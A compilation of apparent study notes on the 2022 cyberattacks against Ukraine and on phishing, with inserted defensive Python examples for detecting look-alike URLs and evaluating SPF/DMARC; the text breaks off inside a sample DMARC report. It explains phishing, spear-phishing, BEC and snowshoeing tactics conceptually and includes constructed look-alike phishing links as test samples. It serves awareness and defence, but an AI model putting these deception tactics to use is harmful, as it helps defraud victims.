On 19 January, the Russian advanced persistent threat (APT) Gamaredon (also known as Primitive Bear) attempted to compromise a Western government entity in Ukraine.[13] Cyber espionage appears to be the main goal of the group,[13] which has been active since 2013; unlike most APTs, Gamaredon broadly targets users all over the globe (in addition to focusing on certain victims, especially Ukrainian organizations[14]) and appears to provide services for other APTs.[15] For example, the InvisiMole threat group has attacked select systems that Gamaredon had earlier compromised and fingerprinted.[14]
Reactions to January attack
Russia
Russia denied allegations by Ukraine that it was linked to the cyberattacks. [16]
Ukraine
Ukrainian government institutions, such as the Center for Strategic
Communications and Information Security and the Ministry of Foreign Affairs,
suggested that the Russian Federation was the perpetrator of the attack, noting
that this would not be the first time that Russia attacked Ukraine.[7][17]
International organizations
European Union High Representative Josep Borrell said of the source of the
attack: “One can very well imagine with a certain probability or with a margin of
error, where it can come from.”[18] The Secretary General of NATO Jens
Stoltenberg announced that the organization would increase its coordination with
Ukraine on cyberdefense in the face of potential additional cyberattacks. NATO
later announced that it would sign an agreement granting Ukraine access to its
malware information sharing platform.[2][7]
February attacks
On 15 February, a large DDoS attack brought down the websites of the defense ministry, army, and Ukraine's two largest banks, PrivatBank and Oschadbank.[3][19][4]
Cybersecurity monitor NetBlocks reported that the attack intensified over the
course of the day, also affecting the mobile apps and ATMs of the banks.[3] The
New York Times described it as "the largest assault of its kind in the country's
history". Ukrainian government officials stated that the attack was likely carried out by a foreign government, and suggested that Russia was behind it.[20]
Although there were fears that the denial-of-service attack could be cover for
more serious attacks, a Ukrainian official said that no such attack had been
discovered.[11]
According to UK government[21] and National Security Council of the US, the attack
was performed by Russian Main Intelligence Directorate (GRU). American
cybersecurity official Anne Neuberger stated that known GRU infrastructure has
been noted transmitting high volumes of communications to Ukraine-based IP
addresses and domains.[22] Kremlin spokesperson Dmitry Peskov denied that the
attack originated from Russia.[23]
On 23 February, a third DDoS attack took down multiple Ukrainian government,
military, and bank websites. Although military and banking websites were
described as having “a more rapid recovery”, the SBU website was offline for an
extended period.[24] Just before 5 pm, data wiping malware was detected on
hundreds of computers belonging to multiple Ukrainian organizations, including in
the financial, defense, aviation, and IT services sectors. ESET Research dubbed the
malware HermeticWiper, named for its genuine code signing certificate from
Cyprus-based company Hermetica Digital Ltd. The wiper was reportedly compiled
on 28 December 2021, while Symantec reported malicious activity as early as
November 2021, implying that the attack was planned months ahead of time.
Symantec also reported wiper attacks against devices in Lithuania, and that some
organizations were compromised months before the wiper attack. Similar to the January WhisperGate attack, ransomware is often deployed simultaneously with the wiper as a decoy, and the wiper damages the master boot record.[25][26]
A day prior to the attack, the EU had deployed a cyber rapid-response team
consisting of about ten cybersecurity experts from Lithuania, Croatia, Poland,
Estonia, Romania, and the Netherlands. It is unknown if this team helped mitigate
the effects of the cyberattack.[27]
The attack coincided with the Russian recognition of separatist regions in eastern
Ukraine and the authorization of Russian troop deployments there. The US and
UK blamed the attack on Russia. Russia denied the accusations and called them
“Russophobic”.[24]
On 26 February, the Minister of Digital Transformation of Ukraine, Mykhailo Fedorov, announced the creation of an IT army, which would include cyber specialists, copywriters, designers, marketers and targetologists. As a result, numerous Russian government websites and banks were attacked.[28] Personal details of dozens of Russian celebrities and officials have been made public, and Ukrainian songs, including Prayer for Ukraine, have been broadcast on some television channels.[29][30]
March attacks

(Figure: Ratio of DNS queries defensively blocked by Quad9 in Ukraine and Poland, 7-9 March 2022.)
Beginning on 6 March, Russia began to significantly increase the frequency of its
cyber-attacks against Ukrainian civilians.[31]
On 9 March alone, the Quad9 malware-blocking recursive resolver intercepted
and mitigated 4.6 million attacks against computers and phones in Ukraine and
Poland, at a rate more than ten times higher than the European average.
Cybersecurity expert Bill Woodcock of Packet Clearing House noted that the
blocked DNS queries coming from Ukraine clearly show an increase in phishing
and malware attacks against Ukrainians, and noted that the Polish numbers were
also higher than usual because 70%, or 1.4 million, of the Ukrainian refugees were
in Poland at the time.[32] Explaining the nature of the attack, Woodcock said
"Ukrainians are being targeted by a huge amount of phishing, and a lot of the
malware that is getting onto their machines is trying to contact malicious
command-and-control infrastructure."[31]
On March 28, RTComm.ru, a Russian Internet service provider, BGP hijacked
Twitter's 104.244.42.0/24 IPv4 address block for a period of two hours fifteen
minutes.[33][34]

PHISHING:
Phishing definition
Phishing is a type of cyberattack that uses disguised email as a weapon. These
attacks use social engineering techniques to trick the email recipient into
believing that the message is something they want or need—a request from their
bank, for instance, or a note from someone in their company—and to click a link
or download an attachment.
"Phish" is pronounced just like it's spelled, which is to say like the word "fish"—
the analogy is of an angler throwing a baited hook out there (the phishing email)
and hoping you bite.
Phishing emails can be targeted in several different ways, with some not being
targeted at all, some being "soft targeted" at someone playing a particular role in
an organization, and some being targeted at specific, high-value people.
Phishing history
One of the oldest types of cyberattacks, phishing dates back to the 1990s, and it's
still one of the most widespread and pernicious, with phishing messages and
techniques becoming increasingly sophisticated.
The term arose among hackers aiming to trick AOL users into giving up their login
information. The "ph" is part of a tradition of whimsical hacker spelling, and was
probably influenced by the term "phreaking," short for "phone phreaking," an
early form of hacking that involved playing sound tones into telephone handsets
to get free phone calls.
Some phishing scams have succeeded well enough to make waves:
 Perhaps one of the most consequential phishing attacks in history
happened in 2016, when hackers managed to get Hillary Clinton campaign
chair John Podesta to offer up his Gmail password.
 The "fappening" attack, in which intimate photos of a number of celebrities
were made public, was originally thought to be a result of insecurity on
Apple's iCloud servers, but was in fact the product of a number of
successful phishing attempts.
 In 2016, employees at the University of Kansas responded to a phishing
email and handed over access to their paycheck deposit information,
resulting in them losing pay.
What a phishing email can do
There are a couple of different ways to break attacks down into categories. One is
by the purpose of the phishing attempt—what it is intended to do. Generally, a
phishing campaign tries to get the victim to do one of two things:
Hand over sensitive information. These messages aim to trick the user into
revealing important data—often a username and password that the attacker can
use to breach a system or account. The classic version of this scam involves
sending out an email tailored to look like a message from a major bank; by
spamming out the message to millions of people, the attackers ensure that at
least some of the recipients will be customers of that bank. The victim clicks on a
link in the message and is taken to a malicious site designed to resemble the
bank's webpage, and then hopefully enters their username and password. The
attacker can now access the victim's account.
Download malware. Like a lot of spam, these types of phishing emails aim to get
the victim to infect their own computer with malware. Often the messages are
"soft targeted"—they might be sent to an HR staffer with an attachment that
purports to be a job seeker's resume, for instance. These attachments are
often .zip files, or Microsoft Office documents with malicious embedded code.
One of the most common forms of malicious code is ransomware; in 2017 it was estimated that 93% of phishing emails contained ransomware attachments.
Types of phishing
Another way to categorize these attacks is by who they target and how the
messages are sent. If there's a common denominator among phishing attacks, it's
the disguise. The attackers spoof their email address so it looks like it's coming
from someone else, set up fake websites that look like ones the victim trusts, and
use foreign character sets to disguise URLs.
That said, there are a variety of techniques that fall under the umbrella of
phishing. Each of these types of phishing are a variation on a theme, with the
attacker masquerading as a trusted entity of some kind, often a real or plausibly
real person, or a company the victim might do business with.
Email phishing: With general, mass-market phishing attacks, emails are sent to
millions of potential victims to try to trick them into logging in to fake versions of
very popular websites.
Ironscales has tallied the most popular brands that hackers use in their phishing
attempts. Of the 50,000-plus fake login pages the company monitored, these
were the top brands attackers used:
 PayPal: 22%
 Microsoft: 19%
 Facebook: 15%
 eBay: 6%
 Amazon: 3%
Spear phishing: When attackers craft a message to target a specific individual. For
instance, the spear phisher might target someone in the finance department and
pretend to be the victim's manager requesting a large bank transfer on short
notice.
Whaling: Whale phishing, or whaling, is a form of spear phishing aimed at the
very big fish—CEOs or other high-value targets like company board members.
Gathering enough information to trick a really high-value target might take time,
but it can have a surprisingly high payoff. In 2008, cybercriminals targeted
corporate CEOs with emails that claimed to have FBI subpoenas attached. In fact,
they downloaded keyloggers onto the executives' computers—and the scammers'
success rate was 10%, snagging almost 2,000 victims.
Business email compromise (BEC): A type of targeted phishing attack in which
attackers purport to be a company’s CEO or other top executive, typically to get
other individuals in that organization to transfer money.
Vishing and smishing: Phishing via phone call and text message, respectively.
Other types of phishing include clone phishing, snowshoeing, social media
phishing, and more—and the list grows as attackers are constantly evolving their
tactics and techniques.
How phishing works
All the tools needed to launch phishing campaigns (known as phishing kits), as
well as mailing lists are readily available on the dark web, making it easy for cyber
criminals, even those with minimal technical skills, to pull off phishing attacks.
A phishing kit bundles phishing website resources and tools that need only be
installed on a server. Once installed, all the attacker needs to do is send out
emails to potential victims.
Some phishing kits allow attackers to spoof trusted brands, increasing the chances
of someone clicking on a fraudulent link. Akamai's research provided in its
Phishing--Baiting the Hook report found 62 kit variants for Microsoft, 14 for
PayPal, seven for DHL, and 11 for Dropbox.
The Duo Labs report, Phish in a Barrel, includes an analysis of phishing kit reuse.
Of the 3,200 phishing kits that Duo discovered, 900 (27%) were found on more
than one host. That number might actually be higher, however. “Why don’t we
see a higher percentage of kit reuse? Perhaps because we were measuring based
on the SHA1 hash of the kit contents. A single change to just one file in the kit
would appear as two separate kits even when they are otherwise identical,” said
Jordan Wright, a senior R&D engineer at Duo and the report’s author.
Phishing examples
Criminals rely on deception and creating a sense of urgency to achieve success
with their phishing campaigns. As the following examples show, these social
engineers know how to capitalize on a crisis.
Phishing example: Corona update
The following screen capture is a phishing campaign discovered by Mimecast that attempts to steal login credentials of the victim's Microsoft OneDrive account. The attacker knew that with more people working from home, sharing of documents via OneDrive would be common.
(Screenshot: Mimecast; image not reproduced here.)
Phishing example: Covid cure
This phishing campaign, identified by Proofpoint, asks victims to load an app on their device to "run simulations of the cure" for COVID-19. The app, of course, is malware.
(Screenshot: Proofpoint; image not reproduced here.)
Phishing example: A matter of public health
This email appears to be from Canada's Public Health Agency and asks recipients to click on a link to read an important letter. The link goes to a malicious document.
(Screenshot: Proofpoint; image not reproduced here.)
How to prevent phishing
The best way to learn to spot phishing emails is to study examples captured in the
wild! Lehigh University's technology services department maintains a gallery of
recent phishing emails received by students and staff.
There also are a number of steps you can take and mindsets you should get into
that will keep you from becoming a phishing statistic, including:
 Always check the spelling of the URLs in email links before you click or enter
sensitive information
 Watch out for URL redirects, where you're subtly sent to a different website
with identical design
 If you receive an email from a source you know but it seems suspicious,
contact that source with a new email, rather than just hitting reply
 Don't post personal data, like your birthday, vacation plans, or your address
or phone number, publicly on social media
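The URL checks in the list above, written out as code. This is an added example, not code from the original article or project: it inspects a link's host for the disguises the text mentions, namely non-ASCII look-alike characters (shown in the punycode form the resolver really uses), letters from more than one script, typo-squats of a trusted brand, and a trusted name buried inside an unrelated domain. The trusted-domain list, the small confusable map (a subset of the Unicode TR39 table), the assumption that the last two labels of a host are its registered domain, and the sample links are all constructed for the example.

```python
import unicodedata
from urllib.parse import urlsplit

# Constructed for the example: brands the organisation's users are known to log in to.
TRUSTED = {"paypal.com", "microsoft.com"}

# Assumption: a small subset of the Unicode TR39 confusables table, enough for the demo.
CONFUSABLES = {
    "а": "a", "е": "e", "о": "o", "р": "p", "с": "c", "х": "x", "і": "i", "ѕ": "s",  # Cyrillic
    "1": "l", "0": "o",                                                                # typo-squats
}


def skeleton(host: str) -> str:
    """Map look-alike characters to the ASCII letters they imitate."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in host)


def registrable(host: str) -> str:
    """Assumption: no public-suffix list; treat the last two labels as the registered domain."""
    return ".".join(host.split(".")[-2:])


def check_link(url: str, trusted=TRUSTED):
    """Return a list of findings for the host in `url`; an empty list means nothing suspicious."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    if not host:
        return ["no host in URL"]
    findings = []

    # 1. Unicode in the host: show the punycode form that DNS will actually resolve.
    puny = host.encode("idna").decode("ascii")
    if puny != host:
        findings.append(f"non-ASCII host: displayed as {host!r}, resolves as {puny!r}")

    # 2. Letters from more than one script (e.g. Latin plus Cyrillic) in a single host name.
    scripts = {unicodedata.name(ch, "?").split()[0] for ch in host if ch.isalpha()}
    if len(scripts) > 1:
        findings.append("mixed scripts in host: " + ", ".join(sorted(scripts)))

    # 3. Compare the registered domain with the trusted list, before and after de-confusing.
    reg = registrable(host)
    if reg in trusted:
        return findings           # the genuine domain, e.g. www.paypal.com
    for brand in sorted(trusted):
        if skeleton(reg) == brand:
            findings.append(f"{reg!r} is a look-alike of trusted {brand!r}")
        elif brand in host:
            findings.append(f"trusted name {brand!r} is buried inside untrusted host {host!r}")
    return findings


# Constructed sample links (the Cyrillic letter is the point of the second one).
SAMPLE_LINKS = [
    "https://www.paypal.com/signin",
    "https://pаypal.com/login",                      # Cyrillic а in place of Latin a
    "https://paypal.com.secure-login.example/",      # brand used as a subdomain of another domain
    "http://paypa1.com/verify",                      # digit 1 in place of l
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(link, "->", check_link(link) or "looks genuine")
```

The order of the checks matters: the genuine domain returns early, so `www.paypal.com` is never reported as "containing" the brand, while `paypal.com.secure-login.example` is, because its registered domain is the attacker's.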
If you work in your company's IT security department, you can implement
proactive measures to protect the organization, including:
 "Sandboxing" inbound email, checking the safety of each link a user clicks
 Inspecting and analyzing web traffic
 Conducting phishing tests to find weak spots and use the results to educate
employees
 Encouraging employees to send you suspected phishing emails, and then following

Phishing: Mass-market emails
The most common form of phishing is the general, mass-mailed type, where
someone sends an email pretending to be someone else and tries to trick the
recipient in doing something, usually logging into a website or downloading
malware. Attacks frequently rely on email spoofing, where the email header—the
from field—is forged to make the message appear as if it were sent by a trusted
sender.
However, phishing attacks don’t always look like a UPS delivery notification email,
a warning message from PayPal about passwords expiring, or an Office 365 email
about storage quotas. Some attacks are crafted to specifically target organizations
and individuals, and others rely on methods other than email.
Spear phishing: Going after specific targets
Phishing attacks get their name from the notion that fraudsters are fishing for
random victims by using spoofed or fraudulent email as bait. Spear phishing
attacks extend the fishing analogy as attackers are specifically targeting high-value
victims and organizations. Instead of trying to get banking credentials for 1,000
consumers, the attacker may find it more lucrative to target a handful of
businesses. A nation-state attacker may target an employee working for another
government agency, or a government official, to steal state secrets.
Spear phishing attacks are extremely successful because the attackers spend a lot
of time crafting information specific to the recipient, such as referencing a
conference the recipient may have just attended or sending a malicious
attachment where the filename references a topic the recipient is interested in.
In a 2017 phishing campaign, Group 74 (a.k.a. Sofact, APT28, Fancy Bear) targeted
cybersecurity professionals with an email pretending to be related to the Cyber
Conflict U.S. conference, an event organized by the United States Military
Academy’s Army Cyber Institute, the NATO Cooperative Cyber Military Academy,
and the NATO Cooperative Cyber Defence Centre of Excellence. While CyCon is a
real conference, the attachment was actually a document containing a malicious
Visual Basic for Applications (VBA) macro that would download and execute
reconnaissance malware called Seduploader.
Whaling: Going after the big one
Different victims, different paydays. A phishing attack specifically targeting an
enterprise’s top executives is called whaling, as the victim is considered to be
high-value, and the stolen information will be more valuable than what a regular
employee may offer. The account credentials belonging to a CEO will open more
doors than an entry-level employee. The goal is to steal data, employee
information, and cash.
Whaling also requires additional research because the attacker needs to know
who the intended victim communicates with and the kind of discussions they
have. Examples include references to customer complaints, legal subpoenas, or
even a problem in the executive suite. Attackers typically start with social
engineering to gather information about the victim and the company before
crafting the phishing message that will be used in the whaling attack.
Business email compromise (BEC): Pretending to be the CEO
Aside from mass-distributed general phishing campaigns, criminals target key
individuals in finance and accounting departments via business email compromise
(BEC) scams and CEO email fraud. By impersonating financial officers and CEOs,
these criminals attempt to trick victims into initiating money transfers into
unauthorized accounts.
Typically, attackers compromise the email account of a senior executive or
financial officer by exploiting an existing infection or via a spear phishing attack.
The attacker lurks and monitors the executive’s email activity for a period of time
to learn about processes and procedures within the company. The actual attack
takes the form of a false email that looks like it has come from the compromised
executive’s account being sent to someone who is a regular recipient. The email
appears to be important and urgent, and it requests that the recipient send a wire
transfer to an external or unfamiliar bank account. The money ultimately lands in
the attacker’s bank account.
According to the Anti-Phishing Working Group's Phishing Activity Trends Report
for Q2 2020, "The average wire transfer loss from Business Email Compromise
(BEC) attacks is increasing: The average wire transfer attempt in the second
quarter of 2020 was $80,183."
Clone phishing: When copies are just as effective
Clone phishing requires the attacker to create a nearly identical replica of a
legitimate message to trick the victim into thinking it is real. The email is sent
from an address resembling the legitimate sender, and the body of the message
looks the same as a previous message. The only difference is that the attachment
or the link in the message has been swapped out with a malicious one. The
attacker may say something along the lines of having to resend the original, or an
updated version, to explain why the victim was receiving the “same” message
again.
This attack is based on a previously seen, legitimate message, making it more
likely that users will fall for the attack. An attacker who has already infected one
user may use this technique against another person who also received the
message that is being cloned. In another variation, the attacker may create a
cloned website with a spoofed domain to trick the victim.
Vishing: Phishing over the phone
Vishing stands for “voice phishing” and it entails the use of the phone. Typically,
the victim receives a call with a voice message disguised as a communication from
a financial institution. For instance, the message might ask the recipient to call a
number and enter their account information or PIN for security or other official
purposes. However, the phone number rings straight to the attacker via a voice-
over-IP service.
In a sophisticated vishing scam in 2019, criminals called victims pretending to be Apple tech support and gave users a number to call to resolve the "security problem." Like the old Windows tech support scam, this scam took advantage of users' fears of their devices being hacked.
Smishing: Phishing via text message
Smishing, a portmanteau of "phishing" and "SMS," the latter being the protocol
used by most phone text messaging services, is a cyberattack that uses misleading
text messages to deceive victims. The goal is to trick you into believing that a
message has arrived from a trusted person or organization, and then convincing
you to take action that gives the attacker exploitable information (like bank
account login credentials, for example) or access to your mobile device.
Smishing is on the rise because people are more likely to read and respond to text
messages than email: 98% of text messages are read and 45% are responded to,
while the equivalent numbers for email are 20% and 6%, respectively. And users
are often less watchful for suspicious messages on their phones than on their
computers, and their personal devices generally lack the type of security available
on corporate PCs.
Snowshoeing: Spreading poisonous messages
Snowshoeing, or “hit-and-run” spam, requires attackers to push out messages via
multiple domains and IP addresses. Each IP address sends out a low volume of
messages, so reputation- or volume-based spam filtering technologies can’t
recognize and block malicious messages right away. Some of the messages make
it to the email inboxes before the filters learn to block them.
Hailstorm campaigns work the same as snowshoe, except the messages are sent
out over an extremely short time span. Some hailstorm attacks end just as the
anti-spam tools catch on and update the filters to block future messages, but the
attackers have already moved on to the next campaign.
Learn to recognize different types of phishing
Users aren’t good at understanding the impact of falling for a phishing attack. A
reasonably savvy user may be able to assess the risk of clicking on a link in an
email, as that could result in a malware download or follow-up scam messages
asking for money. However, a naive user may think nothing would happen, or
wind up with spam advertisements and pop-ups. Only the most-savvy users can
estimate the potential damage from credential theft and account compromise.
This risk assessment gap makes it harder for users to grasp the seriousness of
recognizing malicious messages.
Organizations need to consider existing internal awareness campaigns and make
sure employees are given the tools to recognize different types of attacks.
Organizations also need to beef up security defenses, because some of the
traditional email security tools—such as spam filters—are not enough defense
against some phishing types.
Phishing continues to be one of the primary attack mechanisms for bad actors
with a variety of endgames in mind, in large part because phishing attacks are
trivial to launch and difficult to fully protect against. Some phishing attacks target
customers rather than employees, and others simply aim to damage your
corporate reputation rather than compromise your systems. A key factor in
protecting your business from phishing is to understand your vulnerabilities,
weigh the potential risk to your business, and decide what tools offer the best
protection to match your business needs.
Why phishing is successful
Most phishing attacks are less about the technology and more about social
engineering. It’s amazing how easily humans are manipulated when emotions are
triggered. Many modern phishing emails play on empathy or fear, or even make
hostile accusations in order to trigger an angry response.
Another reason phishing is so successful and popular is that it can be used to
disrupt a target in a number of different ways -- for example, by impacting human
productivity by requiring employees to manually validate message contents or to
involve corporate IT, or compromising financial accounts or enterprise systems
(often leading to ransomware attacks). On the flip side, phishing is hard to
prevent because of the risk of false positives disrupting legitimate business
communication.
How to protect your business against phishing
A big part of protecting your business, employees, and customers from phishing
attacks is by leveraging industry standards and implementing best practices
whenever possible. Standards like Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting, and Conformance (DMARC) were designed to fight spam and sender spoofing by letting a receiving mail server check the mail it accepts: SPF lists the servers allowed to send for a domain, DKIM signs messages so forged senders and tampering can be detected, and DMARC tells receivers what to do (none, quarantine or reject) when a message claiming your domain passes neither check in aligned form, and where to send reports. Put another way, the goal of these standards is to ensure that a mail server claiming to send on behalf of your domain is authorized to do so. Each of these standards is published in DNS and is relatively straightforward to implement.
In fact, you probably get your email through a service provider like Google or Microsoft, and that service includes an up-to-date implementation of these standards. Professional email services like these already provide some level of protection against phishing, but they are far from perfect, which leaves room for dedicated anti-phishing products.
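To make the SPF and DMARC part of this concrete, here is an added example in Python (not from the original article or any mail provider's code) that evaluates a sending IP against a domain's SPF record and reads the domain's DMARC policy, with a weak record shown beside a strict one. The DNS TXT records are constructed in a dictionary so the script runs offline; the domains example.com, weak.example and mailhost.example and the addresses are documentation values chosen for the example. Only the ip4, ip6, include and all mechanisms are evaluated; the a, mx, exists and ptr mechanisms and DKIM signature verification need live DNS and are left out, so in this model an SPF failure is a DMARC failure.

```python
import ipaddress

# Constructed DNS TXT records standing in for live lookups (documentation domains and addresses).
DNS_TXT = {
    "example.com": ["v=spf1 ip4:203.0.113.0/24 include:_spf.mailhost.example -all"],
    "_spf.mailhost.example": ["v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 -all"],
    "_dmarc.example.com": ["v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"],
    "weak.example": ["v=spf1 +all"],              # the weak setting: anyone may send as weak.example
    "_dmarc.weak.example": ["v=DMARC1; p=none"],  # monitoring only, nothing is enforced
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_check(domain, ip, txt=DNS_TXT, depth=0):
    """Evaluate `ip` against the SPF record of `domain` (RFC 7208 subset: ip4, ip6, include, all).
    Returns pass / fail / softfail / neutral / none / permerror."""
    if depth > 10:                                   # RFC 7208 caps DNS-querying terms at 10
        return "permerror"
    records = [r for r in txt.get(domain, []) if r.startswith("v=spf1")]
    if not records:
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in records[0].split()[1:]:
        qualifier = "+"                              # mechanisms default to "+" (pass)
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        if term == "all":
            matched = True
        elif term.startswith(("ip4:", "ip6:")):
            # an IPv4 address is never "in" an IPv6 network (and vice versa), no error is raised
            matched = addr in ipaddress.ip_network(term[4:], strict=False)
        elif term.startswith("include:"):
            matched = spf_check(term[len("include:"):], ip, txt, depth + 1) == "pass"
        else:
            continue    # a, mx, exists, ptr need live DNS: skipped in this offline example
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"    # no mechanism matched and no "all" term was present


def dmarc_policy(domain, txt=DNS_TXT):
    """Return the p= tag of the domain's DMARC record, or None when no record is published."""
    for record in txt.get("_dmarc." + domain, []):
        if record.startswith("v=DMARC1"):
            tags = dict(t.strip().split("=", 1) for t in record.split(";") if "=" in t)
            return tags.get("p", "none")
    return None


def assess_sender(from_domain, sending_ip, txt=DNS_TXT):
    """What a receiving server would do with a message claiming `from_domain` from `sending_ip`."""
    spf = spf_check(from_domain, sending_ip, txt)
    policy = dmarc_policy(from_domain, txt)
    if spf == "pass":
        verdict = "accept"
    elif policy in ("reject", "quarantine"):
        verdict = policy            # DKIM is not modelled, so SPF failure means DMARC failure here
    else:
        verdict = "accept (no enforced policy)"
    return {"spf": spf, "dmarc": policy, "verdict": verdict}


if __name__ == "__main__":
    cases = [("example.com", "203.0.113.7"), ("example.com", "198.51.100.10"),
             ("example.com", "192.0.2.1"), ("weak.example", "192.0.2.1")]
    for domain, ip in cases:
        print(domain, ip, assess_sender(domain, ip))
```

The contrast to look for is the last two cases: a spoofed message claiming example.com from an unlisted address is rejected because the domain publishes "-all" and "p=reject", while the same spoof of weak.example is accepted because "+all" authorises every sender and "p=none" asks receivers to do nothing.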
One major attack method is geared toward stealing information through low-tech
methods such as email replies. Tools like content policies available in business
productivity services such as Microsoft 365, Google Workspace, and even as a
third-party tool from multiple vendors, are invaluable for preventing this sort of
attack from reaching a successful conclusion. Content policies help automate the
identification of key information types like credit card or bank account numbers,
social security numbers, and other information that should be closely guarded,
and prevent this information from being sent outside the organization.
The biggest risk stemming from phishing attacks for most enterprises is system
compromise ultimately resulting in financial or data loss (or even ransomware). As
such, the primary defense mechanism must be a strong form of multi-factor
authentication (MFA) and authentication standards such as Fast Identity Online v2
(FIDO2) or Web Authentication (WebAuthn). Ideally, enterprises should take
MFA a step further and introduce password-less authentication within a zero-trust model.
Modern authentication strategies like risk-based authentication and Security
Assertion Markup Language (SAML) are also powerful tools in preventing the
worst-case scenario from occurring after a successful phishing attack. Each of
these components has a role to play in your organization, and the benefits are
two-fold: the damage done by a compromised password is minimized (if not
eradicated), and systems are put in place to analyze authentication
attempts and react to compromised credentials in real time.
Top anti-phishing tools
A variety of tools are available to help protect your business from the types of
threats phishing attacks present your organization. Half the battle is knowing
what solutions are available and how they can help protect your business, and
thus your employees and customers.
1. Avanan
Avanan offers anti-phishing software for cloud-hosted email, tying into your email
provider using APIs to train their AI using historical email. The service analyzes not
just message contents, formatting, and header information, but evaluates existing
relationships between senders and receivers to establish a level of trust.
2. Barracuda Sentinel
Barracuda Sentinel is another tool that leverages mail provider APIs to protect
against phishing as well as business email compromise (BEC). Because
compromised email accounts tend to lead to more phishing attempts or further
account-based attacks, Barracuda’s focus on minimizing further damage as a
result of a successful phishing attempt has more value than relying solely on
prevention. Barracuda also provides brand protection and domain fraud
prevention through DMARC analysis and reporting.
3. BrandShield
BrandShield focuses exclusively on protecting your corporate brand and that of
your executives. Identifying phishing attacks (through email, social media, or
other mediums) which leverage your brand or the names of your executives is just
one component of BrandShield’s portfolio. BrandShield also monitors the internet
for rogue websites using your brand as well as marketplaces like Amazon where
physical counterfeits of your products could pop up for sale.
4. Cofense PDR
Cofense PDR (Phishing Detection and Response) is a managed service where both
AI-based tools and security professionals are leveraged in concert to identify and
mitigate phishing attacks as they happen. Managed services can be a good option
if you need to maximize the level of protection, as they can be more effective
than even hiring a full-time team to handle phishing prevention since the
managed services team is able to evaluate threat data from all of the enterprise
systems they protect.
5. RSA FraudAction
RSA FraudAction anti-phishing service obviously comes from one of the big names
in network security, and the list of features offered is what you’d expect from a
heavy hitter. The anti-phishing service is a managed service like what Cofense
offers, and RSA brings capabilities like site shutdown, forensics, and optional
countermeasures such as strategically responding to phishing attempts with
planted credentials in order to track the attack chain and respond accordingly.
6. IRONSCALES
IRONSCALES is an email security platform that seeks to strengthen your existing
email system through dynamic detection and analysis: blocking, flagging, or
simply adding a banner to potentially suspicious email. IRONSCALES also offers
end user training, focused on email security and general awareness, which helps
strengthen your defense against the core of phishing: the social engineering
attack.
7. KnowBe4
KnowBe4 boasts one of the biggest names in hacking (Kevin Mitnick) as their Chief
Hacking Officer. Many of Mitnick’s exploits were centered around social
engineering, and their business reflects that by focusing on enabling employees to
make better decisions through education. In addition to their top-rated
awareness training KnowBe4 also offers PhishER, which is a Security
Orchestration, Automation, and Response (SOAR) platform centered around
phishing attempts: enabling your security team to more efficiently respond to
email-based threats to your organization.
8. Mimecast
Mimecast offers several tools for protecting against phishing attempts, including
features which detect malicious links and attachments and either remove them or
render them safe using advanced methods like sandboxing. Mimecast also prevents
code-based attacks initiated through phishing emails, or through more
sophisticated methods like QR codes, by opening links within the Mimecast cloud,
which simplifies deployment and ensures the prevention tools are always
updated to the bleeding edge.
9. Microsoft Defender for Office 365
Microsoft Defender for Office 365 brings similar capabilities as some of the other
tools on this list: user training, phishing detection and prevention, forensic and
root-cause analysis, and even threat hunting. Because Defender is simply an
add-on for Office 365, it's integrated tightly without having to configure the initial
integration. Microsoft also offers preset security policies that you can adjust to
your needs; supporting enforcement, the option for users to override, and
tracking policy changes over time. This service has special advantages for Office
365 customers, and special disadvantages for everyone else.
10. Valimail
Valimail should be of interest even to IT shops with little-to-no budget. Valimail’s
DMARC offering walks you through configuring DMARC for your email domains,
and then aggregates and generates daily DMARC reports. Gaining this visibility
into email authentication can help you rapidly identify additional senders that
may be legitimate, potentially add them to your DMARC configuration, and then
ramp up enforcement in order to prevent unauthorized email forging your
domain. The best part is that Valimail offers several of their DMARC tools for free.
The other service Valimail offers is Amplify, which facilitates implementation of
the BIMI standard (Brand Indicators for Message Identification), which adds a
corporate logo to email originating from your organization, showing that the
sender is authenticated and valid. BIMI not only adds a layer of sophistication to
your email config, it enhances trust in emails coming from your domain both for
receiving servers and ultimately the recipient.
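The visibility the Valimail paragraph describes comes from DMARC aggregate (RUA) reports, XML files that receiving servers send to the `rua=` address. As an added example (not part of the original report and not Valimail's code), the snippet below parses one such report and totals, per sending IP, how much mail passed or failed DMARC. The report itself is constructed for a hypothetical domain `example.test` and receiver `receiver.example`; its layout follows the RFC 7489 aggregate report schema.

```python
"""
Summarize a DMARC aggregate (RUA) report: which sources pass, which fail,
and how much mail each represents. Added example; the report below is
constructed for a hypothetical domain and receiver, not real data.
"""
import xml.etree.ElementTree as ET

SAMPLE_RUA_XML = """<?xml version="1.0"?>
<feedback>
  <report_metadata>
    <org_name>receiver.example</org_name>
    <report_id>constructed-0001</report_id>
    <date_range><begin>1700000000</begin><end>1700086399</end></date_range>
  </report_metadata>
  <policy_published>
    <domain>example.test</domain>
    <adkim>r</adkim><aspf>r</aspf><p>none</p><pct>100</pct>
  </policy_published>
  <record>
    <row>
      <source_ip>203.0.113.10</source_ip><count>120</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.test</header_from></identifiers>
    <auth_results>
      <dkim><domain>example.test</domain><result>pass</result></dkim>
      <spf><domain>example.test</domain><result>pass</result></spf>
    </auth_results>
  </record>
  <record>
    <row>
      <source_ip>198.51.100.7</source_ip><count>35</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.test</header_from></identifiers>
    <auth_results>
      <spf><domain>example.test</domain><result>fail</result></spf>
    </auth_results>
  </record>
  <record>
    <row>
      <source_ip>192.0.2.44</source_ip><count>8</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>fail</spf></policy_evaluated>
    </row>
    <identifiers><header_from>example.test</header_from></identifiers>
    <auth_results>
      <dkim><domain>example.test</domain><result>pass</result></dkim>
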